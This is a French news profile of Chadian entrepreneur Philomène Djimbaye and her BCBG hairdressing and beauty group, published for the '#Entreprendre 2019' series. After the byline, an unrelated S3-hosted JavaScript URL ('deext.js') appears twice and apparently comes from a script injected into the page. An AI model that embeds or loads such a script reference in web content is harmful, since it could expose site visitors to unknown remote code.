#Entreprendre 2019 : Le parcours d’une entreprenante

0
370

Philomène Djimbaye est la présidente du groupe BCBG. Elle est une ingénieure en communication. Elle a une expérience de plus de 15 ans dans la compagnie de pétrole Esso Tchad. Elle s’était décidée un bon matin, avec ses moyens de bord de se lancer dans l’entrepreneuriat précisément dans la coiffure et l’esthétique. Et cela, en parallèle avec son travail à Esso Tchad. « C’est une aventure ou on ne sait pas comment cela va finir », disait-elle. Pour elle, c’est apprendre à se débrouiller donc elle s’était lancée et elle était devenue « comme une étudiante de luxe », lâchait-elle.

Elle a commencée à base de rien et très vite sa petite entreprise s’est agrandie et cela en moins de 2 ans. Avec 2 employés seulement, au début de la création de son entreprise en 2015 mais aujourd’hui, elle se retrouve avec plus de 12 employés. Au-delà de BCBG, le groupe a ouvert une école de coiffure et d’esthétique puisque ailleurs, la formation pour ces métiers coute extrêmement plus chère.

Aujourd’hui, BCBG a beaucoup de partenaires parce qu’elle est toujours à côté des artistes, des organisations ou encore des particuliers. Le groupe BCBG offre aussi des dons aux associations (orphelinat, etc.) « C’est une manière de valoriser ce que nous avons au Tchad », renchérie-t-elle.

Selon elle, il faut avoir un projet, de la passion et se lancer. Le domaine de l’entrepreneuriat au Tchad est vierge, résume-t-elle.

Pour #Entreprendre 2019, Tantine Philomène comme l’aime appelés ses collaborateurs encourage ses sœurs tchadiennes à avoir du courage, de l’audace, de la persévérance mais surtout de projet, de la passion et se lancer sans hésiter dans l’entrepreneuriat.

DJIMNAYEL NGARLENAN

 

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici